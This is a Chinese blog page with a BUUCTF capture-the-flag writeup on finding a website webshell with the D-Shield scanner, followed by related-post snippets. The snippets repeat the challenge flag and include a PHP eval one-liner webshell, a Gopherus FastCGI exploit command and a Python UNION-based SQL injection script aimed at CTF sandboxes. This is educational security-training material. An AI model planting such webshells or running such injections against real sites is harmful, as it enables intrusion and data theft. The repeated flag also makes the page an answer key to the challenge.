BUUCTF 后门查杀 writeup

原创 已于 2022-03-19 22:09:18 修改 · 861 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python

于 2021-10-11 19:50:09 首次发布
博客内容讲述了如何使用D盾扫描文件夹来检测网站后门,强调了寻找flag的技巧,指出真正的flag隐藏在最高级别的文件中,并提供了文件路径。通过这个过程,可以学习到网站安全防护和漏洞排查的方法。

在这里插入图片描述
这里题目中说了,flag是密码,那就可以挨个找password这个关键字,但是真正的flag不是password,而是pass有一点点坑。使用D盾进行扫描文件夹,就可以找出网站的后门。
在这里插入图片描述
flag就在级别最高的那个文件里,这里有路径,找到这个文件,就可以得到flag。

BUUCTF-WriteUp
鱼的博客
02-01 925
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTF-Reverse Writeup【持续更新】
skysys的研究小屋
01-27 1173
BUUCTF 二进制刷题
Buuctf 后门查杀
Dexret的博客
11-18 757
下载该文件,发现该文件为一个网站的源码,结合题意让我们找出该网站的webshell 既然是找webshell,那么直接用查杀软件D盾来扫描该网站源码 成功找到一个多功能大马,可以判断该木马为webshell 打开该目录下的网页源码include.php 对源码进行代码审计 发现一段md5,结合题意说flag为md5 可以判断该题的flag为: flag{6ac45fb83b3bc355c024f5034b947dd3} ...
BUUCTF 后门查杀
m0_49025459的博客
01-20 4015
题目 解压文件,然后将解压后的文件用D盾打开扫描后门 邮件红色的 查看文件 就能看见falg了 flag{6ac45fb83b3bc355c024f5034b947dd3}
BUUCTF 后门查杀 1
YueXuan_521的博客
11-01 3656
BUUCTF 后门查杀 1 小白的网站被小黑攻击了,并且上传了Webshell,你能帮小白找到这个后门么?(Webshell中的密码(md5)即为答案)。2、第一个文件没有flag,但我们在第二个文件中找到了Webshell中的密码,密码也符合md5的格式,这个就是flag值。1、使用工具扫描附件所给的文件夹,可以使用D盾、火绒安全之类的工具,这里我使用D盾。打开D盾,点击自定义扫描,选择附件给的网站文件夹,点击确定。下载附件,解压得到一个网站文件夹。检查出两个文件,我们挨个查看。
BUUCTF MISC——后门查杀
m0_74093152的博客
02-23 826
BUUCTFMISC——后门查杀
buuctf-misc writeup (持续更新)
dameow的博客
01-07 558
内存取证三项 文件下载解压,有几个提示信息。 volatility直接梭。 查看镜像信息imageinfo。此命令用于查看镜像的大概系统,便于执行对应的命令。 查看执行过的cmd命令cmdscan。 从这里可以到小黑在小白的电脑执行了nc,并传送一个zip文件。应该就是题目的机密文件。而且猜测压缩包有密码,对应题目的小白的密码。 还有一个信息就是小黑在小白的桌面写了点什么,以为在桌面会有txt文件。文件扫描filescan。 并不是,桌面啥也没有,txt也没有。没思路的时候
BUUCTF Web】WriteUp超详细
2401_84240129的博客
06-25 1036
根据题目可以看出来这是一道文件上传题目,此类题目一般都是利用网页上传口的一些漏洞,上传诸如一句话木马等带有危险性的文件去进入其他人的服务器,再利用类如菜刀蚁剑等设备连接服务器进行操作。注:这里的逻辑是先把||转换为连接操作符,注意分号隔断了前面的命令,所以要再次添加select来进行查询,这里把1换成其他非零数字也一样会回显flag。在使用AntSword时有的同学在测试连接时显示返回为空,说明你的一句话木马有问题,未能被服务器正常解析,可以检查一下上传的文件格式和代码是否有误。
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 551
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
BUUCTF Reverse rsa WriteUp
PlumpBoy的博客
09-11 746
rsa-WP 打开文件,发现有有两个文件,拖入HxD发现一个是公钥一个是密文,那么本题的目标就是求解私钥进行解密。 先将公钥放入在线工具:http://ctf.ssleye.com/pub_asys.html 解析得到 e=65537 n=86934482296048119190666062003494800588905656017203025617216654058378322103517 然后打开RSA-Tool2,将n填入n处,点击Factor N即可分解,但是大数分解特别慢,建议使用在线工具:h
buuctf 后门查杀
EasonCc的博客
09-27 3747
1.下载得到源码文件夹 2.直接使用D盾查杀后门 3.打开红色标注文件查找相关代码 如题所示pass后的MD5加上flag{}即为flag: flag{6ac45fb83b3bc355c024f5034b947dd3}
buuctf-后门查杀
ncnfjdjjd的博客
02-07 886
D 盾,扫描查杀
buuctf后门查杀
weixin_52620919的博客
11-03 367
附件是一个名字为html的文件夹 然后用D盾扫一下 找到漏洞所在 然后访问相关文件 得到flag 这种思路属实是第一次见到 yyds
应急响应-CTF-BUUCTF-后门查杀 1
theenderofroot的博客
04-12 1728
明显的一个文件包含漏洞代码,可以GET传参自定义文件名并且自动拼接php后缀,但是没有flag。2、下载下来是一个网站源码,看来是一道代码审计题,直接把文件夹放入PhpStorm中。5、那么就只能先看include文件夹了,里面还有个include.php,重点审查。4、 uploud文件夹里有个压缩包,打开看发现是一个很正常的word文档。发现$pass变量,内容好像是MD5加密字符串,包上flag试一试。3、先看web.php,这个文件的名字有点可疑。1、快速过一下题目,下载压缩包。
BUUCTF Misc 后门查杀
Leslie_LIL的博客
02-28 1045
题目如下: 解压后得到文件夹 按照题目提示,用webshell查杀工具D盾扫描后门 D盾下载https://www.d99net.net/ 打开文件,按照题目要求查找密码 密码即是flag
buuctf-misc-26.后门查杀
weixin_49765221的博客
05-04 983
火绒也是安全工具哦
BUUCTF后门查杀
末初 · mochu7
09-23 3000
题目地址:https://buuoj.cn/challenges#%E5%90%8E%E9%97%A8%E6%9F%A5%E6%9D%80 下载附件,使用webshell查杀工具:D盾 /include/include.php flag{6ac45fb83b3bc355c024f5034b947dd3}
Buuctf(misc) 后门查杀
半岛铁盒的博客
08-13 542
用到工具 D盾 用D盾打开此压缩包 找到相应的文件夹 flag{6ac45fb83b3bc355c024f5034b947dd3}
writeup
最新发布
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST['cmd']);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = 'http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='srdnlrlphq'")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

碧羽o(* ̄▽ ̄*)ブ回雪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值